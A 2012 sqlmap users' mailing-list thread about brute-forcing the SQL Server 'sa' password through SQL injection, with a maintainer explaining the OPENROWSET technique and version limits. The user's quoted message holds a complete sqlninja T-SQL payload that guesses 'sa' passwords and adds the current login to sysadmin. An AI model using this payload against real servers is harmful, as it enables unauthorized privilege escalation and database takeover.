Re: [sqlmap-users] bruteforce SA password using SQL INJECTION

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi Juan,

master.dbo.xp_execresultset is a stored extended procedure available
on Microsoft SQL Server 2000. It is not availabe on MSSQL 2005/2008
onwards by default, hence the error message and the DBA brute force
attack fails.

Bernardo

On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:
> I was trying sqlninja.
>
> this is the query it use for bruteforce SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar
> (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37
> begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set
> @p=@p+@z set @q=N'select 1 from
> OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
> 1;exec master.dbo.sp_addsrvrolemember
> '''''+system_user+N''''',''''sysadmin'''' '')' exec
> master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> but I am receiving this error:
>
>
> Could not find stored procedure 'master.dbo.xp_execresultset'.
>
> it was in the HTTP response. this error is because the "openrowset" is
> disable? or is just that the "SA" password is not the correct. (like
> "password wrong" error).
>
> there is any way to check if "openrowset" is enable?
>
>
> thanks.
>
>
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
>>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by thereforce, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > there is a way for bruteforce the SA password using SQL INJECTION?
>> >
>> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
>> > access to the internet (it has the 1433 port blocked),
>> > the current user is a normal user (low privileges User). cannot get SA
>> > hash
>> > password.
>> >
>> > the question is, is there any tool or code or way to bruteforce the SA
>> > password? without direct access to the Sql Server?
>> >
>> > It is a request for add this functionality to SQLMAP, I don't know if is
>> > possible.
>> >
>> > Thanks.
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > Live Security Virtual Conference
>> > Exclusive live event will cover all the ways today's security and
>> > threat landscape has changed and how IT managers can respond.
>> > Discussions
>> > will include endpoint security, mobile security and the latest in
>> > malware
>> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>
>

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)